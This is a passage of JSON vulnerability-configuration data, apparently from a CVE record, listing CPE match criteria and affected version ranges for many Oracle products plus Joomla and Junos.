"criteria": "cpe:2.3:a:oracle:financial_services_balance_sheet_planning:8.0.8:*:*:*:*:*:*:*",
"matchCriteriaId": "4D0D0EAC-300D-44B1-AD4A-93A368D5DBA1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:financial_services_basel_regulatory_capital_basic:*:*:*:*:*:*:*:*",
"matchCriteriaId": "9CB2A0EB-E1C7-4206-8E64-D2EE77C1CD86",
"versionEndIncluding": "8.0.7",
"versionStartIncluding": "8.0.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:financial_services_basel_regulatory_capital_basic:8.1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "8A566893-8DCF-49E4-93D0-0ACCEFD70D3D",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:financial_services_basel_regulatory_capital_internal_ratings_based_approach:*:*:*:*:*:*:*:*",
"matchCriteriaId": "A180039F-22C3-458E-967D-E07C61C69FAF",
"versionEndIncluding": "8.0.7",
"versionStartIncluding": "8.0.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:financial_services_basel_regulatory_capital_internal_ratings_based_approach:8.1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "00E5D719-249D-48B8-BAFC-1E14D250B3F6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:financial_services_data_foundation:*:*:*:*:*:*:*:*",
"matchCriteriaId": "2C5F6B8C-2044-4E68-98BD-37B0CD108434",
"versionEndIncluding": "8.0.8",
"versionStartIncluding": "8.0.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:financial_services_data_governance_for_us_regulatory_reporting:*:*:*:*:*:*:*:*",
"matchCriteriaId": "672949B4-1989-4AA7-806F-EEC07D07F317",
"versionEndIncluding": "8.0.9",
"versionStartIncluding": "8.0.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:financial_services_data_integration_hub:*:*:*:*:*:*:*:*",
"matchCriteriaId": "73E05211-8415-42FB-9B93-959EB03B090B",
"versionEndIncluding": "8.0.7",
"versionStartIncluding": "8.0.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:financial_services_data_integration_hub:8.1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "9476D1DA-C8A8-40A0-94DD-9B46C05FD461",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:financial_services_enterprise_financial_performance_analytics:8.0.6:*:*:*:*:*:*:*",
"matchCriteriaId": "7DEE0A37-6B9A-43FE-B3E0-8AB5CA368425",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:financial_services_enterprise_financial_performance_analytics:8.0.7:*:*:*:*:*:*:*",
"matchCriteriaId": "CF6A5433-A7D9-4521-9D28-E7684FB76E5B",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:financial_services_funds_transfer_pricing:*:*:*:*:*:*:*:*",
"matchCriteriaId": "AC15899F-8528-4D10-8CD5-F67121D7F293",
"versionEndIncluding": "8.0.7",
"versionStartIncluding": "8.0.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:financial_services_funds_transfer_pricing:8.1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "F727AAC6-6D9F-4B28-B07C-6A93916C43A3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:financial_services_hedge_management_and_ifrs_valuations:*:*:*:*:*:*:*:*",
"matchCriteriaId": "30657F1B-D1FC-4EE6-9854-18993294A01D",
"versionEndIncluding": "8.0.7",
"versionStartIncluding": "8.0.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:financial_services_hedge_management_and_ifrs_valuations:8.1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "51C17460-D326-4525-A7D1-0AED53E75E18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:financial_services_institutional_performance_analytics:*:*:*:*:*:*:*:*",
"matchCriteriaId": "30F0991A-8507-48C4-9A8E-DE5B28C46A99",
"versionEndIncluding": "8.0.7",
"versionStartIncluding": "8.0.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:financial_services_institutional_performance_analytics:8.1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "A00142E6-EEB3-44BD-AB0D-0E5C5640557F",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:financial_services_liquidity_risk_management:8.0.0.1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "00ED7CB0-96F7-4089-9047-A3AC241139C2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:financial_services_liquidity_risk_management:8.0.2:*:*:*:*:*:*:*",
"matchCriteriaId": "005E458D-4059-4E20-A620-B25DEBCE40C2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:financial_services_liquidity_risk_management:8.0.4.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "74008AEE-589F-423E-8D77-EA54C36D776A",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:financial_services_liquidity_risk_management:8.0.5.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "FD85DB06-692F-4E81-BEB7-1E41B438D1FD",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:financial_services_liquidity_risk_management:8.0.6:*:*:*:*:*:*:*",
"matchCriteriaId": "6149C89E-0111-4CF9-90CA-0662D2F75E04",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:financial_services_liquidity_risk_measurement_and_management:8.0.7:*:*:*:*:*:*:*",
"matchCriteriaId": "6CDDF6CA-6441-4606-9D2F-22A67BA46978",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:financial_services_liquidity_risk_measurement_and_management:8.0.8:*:*:*:*:*:*:*",
"matchCriteriaId": "6FA0B592-A216-4320-A4FE-ABCA6B3E7D7A",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:financial_services_liquidity_risk_measurement_and_management:8.1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "CEA4D6CF-D54A-40DF-9B70-E13392D0BE19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:financial_services_loan_loss_forecasting_and_provisioning:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DB6C521C-F104-4E26-82F2-6F63F94108BC",
"versionEndIncluding": "8.0.7",
"versionStartIncluding": "8.0.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:financial_services_loan_loss_forecasting_and_provisioning:8.1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "397B1A24-7C95-4A73-8363-4529A7F6CFCC",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:financial_services_market_risk_measurement_and_management:8.0.5:*:*:*:*:*:*:*",
"matchCriteriaId": "402B8642-7ACC-4F42-87A9-AB4D3B581751",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:financial_services_market_risk_measurement_and_management:8.0.6:*:*:*:*:*:*:*",
"matchCriteriaId": "EF6D5112-4055-4F89-A5B3-0DCB109481B7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:financial_services_market_risk_measurement_and_management:8.0.8:*:*:*:*:*:*:*",
"matchCriteriaId": "D262848E-AA24-4057-A747-6221BA22ADF4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:financial_services_price_creation_and_discovery:*:*:*:*:*:*:*:*",
"matchCriteriaId": "2163B848-D684-4B17-969A-36E0866C5749",
"versionEndIncluding": "8.0.7",
"versionStartIncluding": "8.0.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:financial_services_profitability_management:*:*:*:*:*:*:*:*",
"matchCriteriaId": "00615085-65B2-4211-A766-551842B3356F",
"versionEndIncluding": "8.0.7",
"versionStartIncluding": "8.0.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:financial_services_profitability_management:8.1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "F8E565DA-91BE-44FC-A28F-579BE8D2281A",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:financial_services_regulatory_reporting_for_de_nederlandsche_bank:8.0.4:*:*:*:*:*:*:*",
"matchCriteriaId": "51DB64CA-8953-43BB-AEA9-D0D7E91E9FE3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:financial_services_regulatory_reporting_for_european_banking_authority:8.0.6:*:*:*:*:*:*:*",
"matchCriteriaId": "669BA301-4D29-4692-823B-CDEDD2A5BD18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:financial_services_regulatory_reporting_for_european_banking_authority:8.0.7:*:*:*:*:*:*:*",
"matchCriteriaId": "419559E6-5441-4335-8FE1-6ADAAD9355DE",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:financial_services_regulatory_reporting_for_us_federal_reserve:*:*:*:*:*:*:*:*",
"matchCriteriaId": "036E4450-53C6-4322-9C7D-91DA94C9A3C9",
"versionEndIncluding": "8.0.7",
"versionStartIncluding": "8.0.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:financial_services_retail_customer_analytics:*:*:*:*:*:*:*:*",
"matchCriteriaId": "89C26226-A3CF-4D36-BBDA-80E298E0A51F",
"versionEndIncluding": "8.0.6",
"versionStartIncluding": "8.0.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:financial_services_retail_performance_analytics:8.0.6:*:*:*:*:*:*:*",
"matchCriteriaId": "F67D1332-621E-4756-B205-97A5CF670A19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:financial_services_retail_performance_analytics:8.0.7:*:*:*:*:*:*:*",
"matchCriteriaId": "6748C867-0A52-452B-B4D6-DA80396F4152",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:financial_services_revenue_management_and_billing:2.4.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "A64B5C4C-DF69-4292-A534-EDC5955CDDAE",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:financial_services_revenue_management_and_billing:2.4.0.1:*:*:*:*:*:*:*",
"matchCriteriaId": "C7141C66-0384-4BA1-A788-91DEB7EF1361",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:fusion_middleware_mapviewer:12.2.1.3.0:*:*:*:*:*:*:*",
"matchCriteriaId": "06E586B3-3434-4B08-8BE3-16C528642CA5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:healthcare_foundation:7.1.1:*:*:*:*:*:*:*",
"matchCriteriaId": "26A1F27B-C3AC-4D13-B9B2-2D6CF65D07BC",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:healthcare_foundation:7.2.0:*:*:*:*:*:*:*",
"matchCriteriaId": "B95E8056-51D8-4390-ADE3-661B7AE1D7CE",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:healthcare_foundation:7.2.2:*:*:*:*:*:*:*",
"matchCriteriaId": "4EFC8DAB-E5D8-420C-B800-08F8C5BF3F4F",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:healthcare_foundation:7.3.0:*:*:*:*:*:*:*",
"matchCriteriaId": "9059A907-508B-4844-8D7B-0FA68C0DF6A6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:healthcare_translational_research:3.1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "A5ACB1D2-69CE-4B7D-9B51-D8F80E541631",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:healthcare_translational_research:3.2.1:*:*:*:*:*:*:*",
"matchCriteriaId": "B1F726C6-EA5A-40FF-8809-4F48E4AE6976",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:healthcare_translational_research:3.3.1:*:*:*:*:*:*:*",
"matchCriteriaId": "CD7C26E3-BB0D-4218-8176-319AEA2925C8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:healthcare_translational_research:3.3.2:*:*:*:*:*:*:*",
"matchCriteriaId": "DD67072F-3CFC-480D-9360-81A05D523318",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:healthcare_translational_research:3.4.0:*:*:*:*:*:*:*",
"matchCriteriaId": "652E762A-BCDD-451E-9DE3-F1555C1E4B16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:hospitality_guest_access:4.2.0:*:*:*:*:*:*:*",
"matchCriteriaId": "1A3DC116-2844-47A1-BEC2-D0675DD97148",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:hospitality_guest_access:4.2.1:*:*:*:*:*:*:*",
"matchCriteriaId": "E0F1DF3E-0F2D-4EFC-9A3E-F72149C8AE94",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:hospitality_materials_control:18.1:*:*:*:*:*:*:*",
"matchCriteriaId": "2AC63D10-2326-4542-B345-31D45B9A7408",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:hospitality_simphony:*:*:*:*:*:*:*:*",
"matchCriteriaId": "7BFD7783-BE15-421C-A550-7FE15AB53ABF",
"versionEndIncluding": "19.1.2",
"versionStartIncluding": "19.1.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:hospitality_simphony:18.1:*:*:*:*:*:*:*",
"matchCriteriaId": "1F7BF047-03C5-4A60-B718-E222B16DBF41",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:hospitality_simphony:18.2:*:*:*:*:*:*:*",
"matchCriteriaId": "E3A73D81-3E1A-42E6-AB96-835CDD5905F2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:identity_manager:12.2.1.3.0:*:*:*:*:*:*:*",
"matchCriteriaId": "AA10CA55-C155-4DAD-A109-87A80116F1A1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:insurance_accounting_analyzer:8.0.9:*:*:*:*:*:*:*",
"matchCriteriaId": "66136D6D-FC52-40DB-B7B6-BA8B7758CE16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:insurance_allocation_manager_for_enterprise_profitability:8.0.8:*:*:*:*:*:*:*",
"matchCriteriaId": "06514F46-544B-4404-B45C-C9584EBC3131",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:insurance_allocation_manager_for_enterprise_profitability:8.1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "3BD4BF9A-BF38-460D-974D-5B3255AAF946",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:insurance_data_foundation:*:*:*:*:*:*:*:*",
"matchCriteriaId": "92D538A5-819D-4DF7-85FE-4D4EB6E230E0",
"versionEndIncluding": "8.0.7",
"versionStartIncluding": "8.0.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:insurance_ifrs_17_analyzer:8.0.6:*:*:*:*:*:*:*",
"matchCriteriaId": "AEDA3A88-002B-4700-9277-3187C0A3E4B4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:insurance_ifrs_17_analyzer:8.0.7:*:*:*:*:*:*:*",
"matchCriteriaId": "BE886BC5-F807-4627-8233-2290817FE205",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:insurance_insbridge_rating_and_underwriting:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B47C73D0-BE89-4D87-8765-12C507F13AFF",
"versionEndIncluding": "5.6.0.0",
"versionStartIncluding": "5.0.0.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:insurance_insbridge_rating_and_underwriting:5.6.1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "5B8AA91A-1880-43CD-938D-48EF58ACF2CF",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:insurance_performance_insight:8.0.7:*:*:*:*:*:*:*",
"matchCriteriaId": "E6B5D7DB-C70E-4926-819F-E39B79F4D0C5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:jd_edwards_enterpriseone_tools:9.2:*:*:*:*:*:*:*",
"matchCriteriaId": "41684398-18A4-4DC6-B8A2-3EBAA0CBF9A6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:jdeveloper:11.1.1.9.0:*:*:*:*:*:*:*",
"matchCriteriaId": "A7506589-9B3B-49BA-B826-774BFDCC45B8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:jdeveloper:12.2.1.3.0:*:*:*:*:*:*:*",
"matchCriteriaId": "228DA523-4D6D-48C5-BDB0-DB1A60F23F8B",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:jdeveloper:12.2.1.4.0:*:*:*:*:*:*:*",
"matchCriteriaId": "335AB6A7-3B1F-4FA8-AF08-7D64C16C4B04",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:jdeveloper_and_adf:11.1.1.9.0:*:*:*:*:*:*:*",
"matchCriteriaId": "37EB4A1D-A875-46B7-BEB0-694D1F400CF7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:jdeveloper_and_adf:12.1.3.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "2233F287-6B9F-4C8A-A724-959DD3AD29AF",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:jdeveloper_and_adf:12.2.1.3.0:*:*:*:*:*:*:*",
"matchCriteriaId": "2381FAB6-8D36-4389-98E4-74F3462654BA",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:knowledge:*:*:*:*:*:*:*:*",
"matchCriteriaId": "9E587602-BA7D-4087-BE29-ACE0B01BD590",
"versionEndIncluding": "8.6.3",
"versionStartIncluding": "8.6.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.55:*:*:*:*:*:*:*",
"matchCriteriaId": "45CB30A1-B2C9-4BF5-B510-1F2F18B60C64",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.56:*:*:*:*:*:*:*",
"matchCriteriaId": "D0A735B4-4F3C-416B-8C08-9CB21BAD2889",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.57:*:*:*:*:*:*:*",
"matchCriteriaId": "7E1E416B-920B-49A0-9523-382898C2979D",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.58:*:*:*:*:*:*:*",
"matchCriteriaId": "D9DB4A14-2EF5-4B54-95D2-75E6CF9AA0A9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:policy_automation:*:*:*:*:*:*:*:*",
"matchCriteriaId": "84668F58-6511-4E53-8213-13B440F454C1",
"versionEndIncluding": "12.2.15",
"versionStartIncluding": "12.2.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:policy_automation:10.4.7:*:*:*:*:*:*:*",
"matchCriteriaId": "9D8B3B57-73D6-4402-987F-8AE723D52F94",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:policy_automation:12.1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "62BF043E-BCB9-433D-BA09-7357853EE127",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:policy_automation:12.1.1:*:*:*:*:*:*:*",
"matchCriteriaId": "3F26FB80-F541-4B59-AC3C-633F49388B59",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:policy_automation_connector_for_siebel:10.4.6:*:*:*:*:*:*:*",
"matchCriteriaId": "0DB5E2C7-9C68-4D3B-95AD-9CBF65DE1E94",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:policy_automation_for_mobile_devices:*:*:*:*:*:*:*:*",
"matchCriteriaId": "12D3B2F0-E9C7-432B-91C6-A6C329A84B78",
"versionEndIncluding": "12.2.15",
"versionStartIncluding": "12.2.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:primavera_gateway:*:*:*:*:*:*:*:*",
"matchCriteriaId": "06CF27F6-ADC1-480C-9D2E-2BD1E7330C32",
"versionEndIncluding": "16.2.11",
"versionStartIncluding": "16.2.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:primavera_gateway:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E4AA3854-C9FD-4287-85A0-EE7907D1E1ED",
"versionEndIncluding": "17.12.7",
"versionStartIncluding": "17.12.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:primavera_gateway:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E8CD4002-F310-4BE4-AF7B-4BCCB17DA6FF",
"versionEndIncluding": "18.8.9",
"versionStartIncluding": "18.8.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:primavera_gateway:*:*:*:*:*:*:*:*",
"matchCriteriaId": "69112C56-7747-4E11-A938-85A481529F58",
"versionEndIncluding": "19.12.4",
"versionStartIncluding": "19.12.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:primavera_gateway:15.2.18:*:*:*:*:*:*:*",
"matchCriteriaId": "D9E628E7-6CC5-418C-939F-8EEA69B222A0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:primavera_unifier:*:*:*:*:*:*:*:*",
"matchCriteriaId": "08FA59A8-6A62-4B33-8952-D6E658F8DAC9",
"versionEndIncluding": "17.12",
"versionStartIncluding": "17.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:primavera_unifier:16.1:*:*:*:*:*:*:*",
"matchCriteriaId": "D55A54FD-7DD1-49CD-BE81-0BE73990943C",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:primavera_unifier:16.2:*:*:*:*:*:*:*",
"matchCriteriaId": "82EB08C0-2D46-4635-88DF-E54F6452D3A3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:primavera_unifier:18.8:*:*:*:*:*:*:*",
"matchCriteriaId": "202AD518-2E9B-4062-B063-9858AE1F9CE2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:real-time_scheduler:*:*:*:*:*:*:*:*",
"matchCriteriaId": "99579D88-27C0-4B93-B2F4-69B6781BC4BD",
"versionEndIncluding": "2.3.0.3",
"versionStartIncluding": "2.3.0.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:rest_data_services:11.2.0.4:*:*:*:-:*:*:*",
"matchCriteriaId": "36FC547E-861A-418C-A314-DA09A457B13A",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:rest_data_services:12.1.0.2:*:*:*:-:*:*:*",
"matchCriteriaId": "DF9FEE51-50E3-41E9-AA0D-272A640F85CC",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:rest_data_services:12.2.0.1:*:*:*:-:*:*:*",
"matchCriteriaId": "E69E905F-2E1A-4462-9082-FF7B10474496",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:rest_data_services:18c:*:*:*:-:*:*:*",
"matchCriteriaId": "0F9B692C-8986-4F91-9EF4-2BB1E3B5C133",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:rest_data_services:19c:*:*:*:-:*:*:*",
"matchCriteriaId": "C5F4C40E-3ABC-4C59-B226-224262DCFF37",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:retail_back_office:14.0:*:*:*:*:*:*:*",
"matchCriteriaId": "31C7EEA3-AA72-48DA-A112-2923DBB37773",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:retail_back_office:14.1:*:*:*:*:*:*:*",
"matchCriteriaId": "F0735989-13BD-40B3-B954-AC0529C5B53D",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:retail_central_office:14.0:*:*:*:*:*:*:*",
"matchCriteriaId": "83B5F416-56AE-4DC5-BCFF-49702463E716",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:retail_central_office:14.1:*:*:*:*:*:*:*",
"matchCriteriaId": "58405263-E84C-4071-BB23-165D49034A00",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:retail_customer_insights:15.0:*:*:*:*:*:*:*",
"matchCriteriaId": "AD4AB77A-E829-4603-AF6A-97B9CD0D687F",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:retail_customer_insights:16.0:*:*:*:*:*:*:*",
"matchCriteriaId": "6DE15D64-6F49-4F43-8079-0C7827384C86",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:retail_customer_management_and_segmentation_foundation:18.0:*:*:*:*:*:*:*",
"matchCriteriaId": "36E16AEF-ACEB-413C-888C-8D250F65C180",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:retail_customer_management_and_segmentation_foundation:19.0:*:*:*:*:*:*:*",
"matchCriteriaId": "9EFAEA84-E376-40A2-8C9F-3E0676FEC527",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:retail_point-of-service:14.0:*:*:*:*:*:*:*",
"matchCriteriaId": "237968A4-AE89-44DC-8BA3-D9651F88883D",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:retail_point-of-service:14.1:*:*:*:*:*:*:*",
"matchCriteriaId": "E13DF2AE-F315-4085-9172-6C8B21AF1C9E",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:retail_returns_management:14.0:*:*:*:*:*:*:*",
"matchCriteriaId": "959316A8-C3AF-4126-A242-3835ED0AD1E8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:retail_returns_management:14.1:*:*:*:*:*:*:*",
"matchCriteriaId": "BDB925C6-2CBC-4D88-B9EA-F246F4F7A206",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:service_bus:11.1.1.9.0:*:*:*:*:*:*:*",
"matchCriteriaId": "1E2B6C75-3EB5-4BCE-B5D1-39DD3DE94139",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:service_bus:12.1.3.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "70BEF219-45EC-4A53-A815-42FBE20FC300",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:service_bus:12.2.1.3.0:*:*:*:*:*:*:*",
"matchCriteriaId": "1EA2023A-1AD6-41FE-A214-9D1F6021D6B6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:siebel_mobile_applications:*:*:*:*:*:*:*:*",
"matchCriteriaId": "2AA4E307-D5FA-461D-9809-BDD123AE7B74",
"versionEndIncluding": "19.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:siebel_ui_framework:20.8:*:*:*:*:*:*:*",
"matchCriteriaId": "98B9198C-11DF-4E80-ACFC-DC719CED8C7E",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:storagetek_tape_analytics_sw_tool:2.3.0:*:*:*:*:*:*:*",
"matchCriteriaId": "587EE4F3-E7AC-4A69-9476-0E71E75EE7A4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:system_utilities:19.1:*:*:*:*:*:*:*",
"matchCriteriaId": "A7961BBD-6411-4D32-947D-3940221C235B",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:tape_library_acsls:8.5:*:*:*:*:*:*:*",
"matchCriteriaId": "162C6FD9-AEC2-4EBA-A163-3054840B8ACE",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:tape_library_acsls:8.5.1:*:*:*:*:*:*:*",
"matchCriteriaId": "A6879D52-A44E-4DF8-8A3A-3613822EB469",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:transportation_management:1.4.3:*:*:*:*:*:*:*",
"matchCriteriaId": "5AAF89C1-AAC2-449C-90C1-895F5F8843B4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:utilities_mobile_workforce_management:*:*:*:*:*:*:*:*",
"matchCriteriaId": "2F2D3FA0-BD9D-4828-AE36-1CE43D9B07D1",
"versionEndIncluding": "2.3.0.3",
"versionStartIncluding": "2.3.0.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:webcenter_sites:12.2.1.3.0:*:*:*:*:*:*:*",
"matchCriteriaId": "D551CAB1-4312-44AA-BDA8-A030817E153A",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "B40B13B7-68B3-4510-968C-6A730EB46462",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:weblogic_server:12.1.3.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "C93CC705-1F8C-4870-99E6-14BF264C3811",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:weblogic_server:12.2.1.3.0:*:*:*:*:*:*:*",
"matchCriteriaId": "F14A818F-AA16-4438-A3E4-E64C9287AC66",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:weblogic_server:12.2.1.4.0:*:*:*:*:*:*:*",
"matchCriteriaId": "4A5BB153-68E0-4DDA-87D1-0D9AB7F0A418",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:weblogic_server:14.1.1.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "04BCDC24-4A21-473C-8733-0D9CFB38A752",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:joomla:joomla\\!:*:*:*:*:*:*:*:*",
"matchCriteriaId": "C63557DE-E65B-46F4-99C4-247EACCB7BBA",
"versionEndIncluding": "3.9.4",
"versionStartIncluding": "3.0.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:juniper:junos:21.2:-:*:*:*:*:*:*",
